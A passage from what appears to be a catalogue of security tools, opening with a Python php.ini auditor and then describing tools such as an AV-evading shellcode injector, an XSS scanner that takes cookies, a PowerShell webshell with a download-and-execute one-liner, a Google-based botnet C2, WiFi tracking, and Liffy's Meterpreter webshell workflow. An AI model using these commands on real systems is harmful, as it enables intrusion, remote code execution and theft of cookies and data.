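    ("expose_php", {"off", "0"}, "advertises the PHP version in the X-Powered-By response header", PHP_DOC),
    ("display_errors", {"off", "0", "stderr"}, "shows file paths and stack traces to remote clients", PHP_DOC),
    ("allow_url_include", {"off", "0"}, "lets include()/require() pull code from remote URLs", PHP_DOC),
    ("allow_url_fopen", {"off", "0"}, "lets file functions open remote URLs, widening SSRF/RFI exposure", PHP_DOC),
]


def parse_ini(text):
    """Minimal php.ini reader: strips ; comments and [sections], lowercases keys and values."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def audit_php_ini(text, checks=PHP_CHECKS):
    """Return one finding per check: FAIL for a weak value, PASS for an acceptable one,
    INFO when the directive is unset (the built-in default applies, which varies by version)."""
    settings = parse_ini(text)
    findings = []
    for key, ok_values, why, doc in checks:
        if key not in settings:
            status, value = "INFO", "<unset>"
        elif settings[key] in ok_values or settings[key] == "":
            status, value = "PASS", settings[key]
        else:
            status, value = "FAIL", settings[key]
        findings.append({"directive": key, "value": value, "status": status, "why": why, "doc": doc})
    return findings


def failures(text):
    """Just the directive names that need attention, for a quick summary."""
    return [f["directive"] for f in audit_php_ini(text) if f["status"] == "FAIL"]
```

Reporting an unset directive as INFO rather than PASS is deliberate: the effective value then comes from the compiled-in default, which differs between PHP versions, so the auditor has to confirm it on the running interpreter (php -i) rather than trust the file.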


HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files


HashMyFiles is a small utility that calculates the MD5 and SHA1 hashes (and CRC32 checksums) of one or more files on your system. You can easily copy the MD5/SHA1 hash list to the clipboard, or save it to a text/html/xml file.

HashMyFiles can also be launched from the Windows Explorer context menu to display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles does not require any installation process or additional DLL files. To start using it, simply run the executable file (HashMyFiles.exe).

After you run it, you can add the files and folders whose MD5/SHA1 hashes you want to view, either with the 'Add File' and 'Add Folder' options under the File menu or by dragging the files and folders from Explorer into the main window of HashMyFiles.

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hash list to a text/html/xml file. Note that MD5 and SHA1 are both vulnerable to collision attacks and CRC32 is not a cryptographic hash at all; they are fine for spotting accidental corruption or matching a file against a known sample, but do not rely on them to prove that a file was not deliberately tampered with.

Shellter - A Dynamic ShellCode Injector


Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and does not apply modifications such as changing the memory access permissions of sections, adding an extra section with RWE access, or anything else that would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.


PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.


Microsoft's PsExec tool (originally by SysInternal's Mark Russinovich) is a favorite of system administrators everywhere. It just has two tiny flaws:
  1. PsExec can not be redistributed
  2. Sensitive command-line options like username and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples


PAExec \\{server IP address} -s cmd.exe
Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig
View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe
Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

DarunGrim - A Patch Analysis and Binary Diffing Tool


DarunGrim is a free binary diffing tool.

Binary diffing is a powerful technique for reverse-engineering patches released by software vendors such as Microsoft. By analyzing security patches in particular, you can dig into the details of the vulnerabilities they fix. You can use that information to learn what causes the software to break, and to write protection code for those specific vulnerabilities. It is also used to write 1-day exploits, by malware writers and security researchers alike.

This binary diffing technique is especially useful for Microsoft binaries. Unlike other vendors, Microsoft releases patches regularly, and the patched vulnerabilities are relatively concentrated in small areas of the code. That makes the patched part more visible and apparent to the patch analyst.


XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation


XSSYA works in two stages. In the first, it sends the payload encoded to bypass the web application firewall and inspects the response; if the server answers 200, it moves to the second stage, which searches the returned HTML for the decoded payload. If the payload is found, the final step executes it with document.cookie to retrieve the cookie.


XSSYA Features
  • Supports HTTPS
  • After confirmation, executes the payload to get cookies
  • Runs on Windows and Linux
  • Identifies 3 types of WAF (Mod_Security, WebKnight, F5 BIG-IP)
  • Continuously growing library of encoded payloads to bypass WAFs (web application firewalls)
  • Supports saving the web page's HTML code before executing the payload, and viewing the HTML code on screen or in the terminal
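The two request/response stages described above, plus the WAF identification, as an added Python example that is not XSSYA's code. The payload and the responses are constructed; the WAF fingerprints are common heuristics assumed for this example, not XSSYA's signature set. The one thing the example adds to the description is the distinction between a payload that comes back verbatim and one that comes back HTML-escaped, which a plain substring search for the decoded payload would miss.

```python
import html
from urllib.parse import quote

# Constructed test payload; XSSYA ships its own library of encoded payloads.
PAYLOAD = '<img src=x onerror="alert(1)">'

# Constructed responses, (status, headers, body), for the same parameter handled four different ways.
SAMPLE_RESPONSES = {
    "raw": (200, {}, '<p>You searched for: <img src=x onerror="alert(1)"></p>'),
    "escaped": (200, {}, '<p>You searched for: &lt;img src=x onerror=&quot;alert(1)&quot;&gt;</p>'),
    "webknight": (999, {}, "No Hacking"),
    "bigip": (200, {"Set-Cookie": "TS01a2b3c4=0123"},
              "The requested URL was rejected. Please consult with your administrator."),
}


def encode_for_request(payload):
    """Method 1: percent-encode the payload for the query string (the form a naive filter may not match)."""
    return quote(payload, safe="")


def classify_reflection(status, body, payload):
    """Method 2: after a 200 response, look for the decoded payload in the HTML and say how it came back.

    Only 'reflected-raw' is worth carrying to the confirmation step (running the payload to read
    document.cookie); an escaped or still-encoded reflection was neutralised by the application.
    """
    if status != 200:
        return "no-response"
    if payload in body:
        return "reflected-raw"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "reflected-escaped"
    if quote(payload, safe="") in body:
        return "reflected-encoded"
    return "not-reflected"


def identify_waf(status, headers, body):
    """Heuristic WAF fingerprints (assumptions made for this example, not XSSYA's own signatures):
    WebKnight answers with HTTP status 999, F5 BIG-IP ASM with its 'requested URL was rejected'
    page and TS-prefixed cookies, ModSecurity commonly with a 403 whose page or Server header names it."""
    body_lower = body.lower()
    if status == 999:
        return "WebKnight"
    cookies = headers.get("Set-Cookie", "")
    if "the requested url was rejected" in body_lower or cookies.startswith("TS"):
        return "F5 BIG-IP"
    server = headers.get("Server", "").lower()
    if status == 403 and ("mod_security" in body_lower or "mod_security" in server):
        return "ModSecurity"
    return None
```

Even a raw reflection is not yet proof of execution: the payload may land inside an attribute, a script string or a comment where it does not run, which is exactly why XSSYA keeps the document.cookie execution as a separate confirmation step.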

Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework


A framework for NoSQL scanning, enumeration and exploitation.
NoSQL databases are schema-less databases, invented to store data easily and flexibly.
NoSQL databases have gained popularity, and their security has always been under scrutiny.
The NoSQL Exploitation Framework focuses on scanning, enumerating and exploiting these databases.
The tool supports five databases: MongoDB, CouchDB, Redis, HBase and Cassandra.

Added Features:

  • First ever tool with added support for Mongo, Couch, Redis, H-Base and Cassandra
  • Support for NoSQL web apps
  • Added payload list for JS injection and web application enumeration
  • Scan support for Mongo, CouchDB and Redis
  • Dictionary attack support for Mongo, Couch and Redis
  • Enumeration module added for the DBs; retrieves data in the DBs in one shot
  • Currently discovers the web interface for Mongo
  • Shodan query feature
  • Multithreaded IP list scanner
  • Dump and copy database features added for CouchDB
  • Sniff for Mongo, Couch and Redis

Installation

  • Run chmod +x install.sh nosqlmap.py
  • ./install.sh
  • nosqlexp.py -h (For Help Options)

Sample Usage

  • nosqlexp.py -ip localhost -scan
  • nosqlexp.py -ip localhost -dict mongo -file b.txt
  • nosqlexp.py -ip localhost -enum couch
  • nosqlexp.py -ip localhost -enum redis
  • nosqlexp.py -ip localhost -clone couch
  • nosqlexp.py -ip localhost -webapp "web_app_link"

Antak WebShell - A webshell which utilizes PowerShell


Antak is a webshell written in C#.NET which utilizes PowerShell. Antak is a part of Nishang, and updates can be found here: https://github.com/samratashok/nishang

Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind when running commands that depend on state (like changing the current directory or running session-aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in the command textbox and click 'Encode and Execute'. A reasonably large script can be executed this way.
  2. Use a PowerShell one-liner (example below) for download and execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
  3. Upload the script to the target and execute it.
  4. Make the script a semicolon-separated one-liner.
Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must enter the actual path on the server (with write permissions) in the command textbox. (An OS temporary directory like C:\Windows\Temp may be writable.) Then use the Browse and Upload buttons to upload the file to that path.

Downloading a file - To download a file, enter the actual path on the server in the command textbox. Then click the Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

Moo0 File Monitor - Monitor file access easily


Moo0 File Monitor lets you easily monitor the file access activity on your system.
Have you ever wondered what your disk system is doing behind the scenes? Why is the disk busy? What is scratching your HDD? You can find out using this simple program.


OWASP Mantra Security Toolkit - Browser Based Security Framework


OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can come in handy for students, penetration testers, web application developers, security professionals, etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is light, flexible, portable and user-friendly with a nice graphical user interface. You can carry it on memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on your system within minutes. Mantra is absolutely free of cost and takes no time to set up.

Mantra is a browser especially designed for web application security testing. With such a product, more people will come to know the ease and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built-in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects, etc. This makes it good software for performing basic security checks and sometimes exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides
  • A web application security testing framework built on top of a browser.
  • Supports Windows, Linux (both 32- and 64-bit) and Macintosh.
  • Can work with other software like ZAP using the built-in proxy management function, which makes it much more convenient.
  • Available in 9 languages: Arabic, Chinese (Simplified), Chinese (Traditional), English, French, Portuguese, Russian, Spanish and Turkish.
  • Comes installed with major security distributions including BackTrack and Matriux.

Xenotix xBOT - A Cross Platform PoC Bot that abuses certain Google Services to implement its C&C


Xenotix xBOT is a proof of concept cross-platform (Linux, Windows, Mac) bot written in Python that abuses certain Google services to implement a Command & Control center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheets are abused to implement C2 for a bot network. A Google Form acts as the C2: all entries submitted to the form are sent to an attached spreadsheet. A bot can then listen on the Google Data API URL, extract the commands, and later send back the response via the same form. The Google Data API allows fetching the contents of a published spreadsheet in a variety of formats; the spreadsheet feeds are fetched in RSS format and parsed. To implement the bot, the source is parsed, the commands are fetched, and the corresponding operations are performed. xBOT's communication is encrypted because it uses Google's own SSL connection, and it is not affected by firewalls since it works at the application layer. The botnet's commands and responses are encrypted with SSL by Google itself, making it harder to sniff the bot's communications on the network. It is a prototype bot with the bare minimum features of a typical bot. The intention of this tool is to give an idea of how Google APIs can be abused for botnet implementation.

xBOT COMMANDS
  • xSYSINFO : Get System Information
  • EXECUTE : Execute a passive system command
  • xDOWNLOAD : Download a file from a URL
  • xUPLOAD : Upload a file
  • xNETWORK : Get network information
  • xPORTSCAN : Run a Portscan
  • xSCREENSHOT : Grab a Screenshot
  • xKILL : Kill and Remove the xBOT.

Snoopy - A distributed tracking and data interception framework


Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD-level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds, could we create our own distributed tracking and data interception framework, with functionality for simple analysis of the collected data?

Snoopy consists of four components:
  • Client software (aka Snoopy Drone software)
  • Server software
  • Web interface
  • Maltego transforms

Plug-ins
Plug-ins consist of two parts:
  • Back-end (data providing) part, written in Python
  • Front-end (displaying) part, written in JavaScript (optional)

Requirements
  • Ubuntu 12.04 LTS 32-bit online server
  • One or more Linux-based client devices with internet connectivity and a WiFi device supporting injection drivers. We'd recommend the Nokia N900.
  • A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.


sb0x-project - A simple and Lightweight framework for Penetration testing


sb0x-project is a lightweight framework for penetration testing written in Python.


Platforms:
  • Linux
  • BSD
  • Other Unix systems

Bing Heartbleed Scan - Tool to extract sites from a Bing search and check whether they are vulnerable


A simple scanner written in bash that extracts sites from a Bing search and checks whether they are vulnerable.


ByWaf - Web Application Penetration Testing Framework


ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python's built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers command-line editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a subclass of Cmd called Wafterpreter, which adds some important functionality, including:
  • Loading and selecting plugins.
  • Getting and setting global and per-plugin options.
  • Additional methods exposing functionality to the plugins.
  • Backgrounding jobs, ending running jobs and querying job status.
  • Loading scripts from the command-line or within the interpreter.
  • Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:
The Wafterpreter API encompasses methods used by the plugins as well as the Wafterpreter's own methods; this allows plugins to refine its behavior by substituting their own methods in place of these.

Utility methods are time-saving shortcuts, while the API methods are the preferred way to change the interpreter's behavior and to query jobs.
  • filename_completer(): a utility method and API method that, given the starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. The parameters to this method are supplied to completion methods, which can in turn pass them on to this method.
  • get_job(): this utility method retrieves a Futures instance from the Wafterpreter's internal list of completed and running jobs, given its job ID. This is useful for querying information about individual jobs (see do_kill() for an example).
  • finished_job_callback(): this overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
  • set_prompt(): an API method for setting the prompt to reflect a new plugin name.
  • get_history_item(): an API method returning the command history.
  • save_history(): an API method for saving the command history to a file.
  • load_history(): an API method for loading the command history from a file.
  • clear_history(): an API method for clearing the command history.
  • load_module(): a private low-level method for loading modules. It is called by do_use(); there should be no reason to use it outside that method.

WebCookiesSniffer - Capture Web site cookies


WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When you select a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies in name-value format in the lower pane.

RCEer - Simple Remote Command Execution scanner


A simple Remote Command Execution scanner written in Python 2.7.

Bro - Passive Open-Source Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expressing arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database


SSDp is a useful penetration testing tool for finding bugs, errors and vulnerabilities in MySQL databases.

Functions
  • SQL Injection
  • Operation System Function
  • Dump Database
  • Extract Database Schema
  • Search Columns Name
  • Read File (read only)
  • Create File (read only)
  • Brute Table & Column

Liffy - Local File Inclusion Exploitation Tool


Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar, some links are included that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found a local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell, which you should be hosting with either Node's or Python's HTTP web server.
http-server /tmp -p 8000

If all this works, you should see a GET request for your shell, which is then downloaded to the working directory on the target webserver. From there, a Metasploit resource file is created for you to spawn a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should see a new Meterpreter session spawn.
curl --silent http://target/vuln/7ka0tqsq.php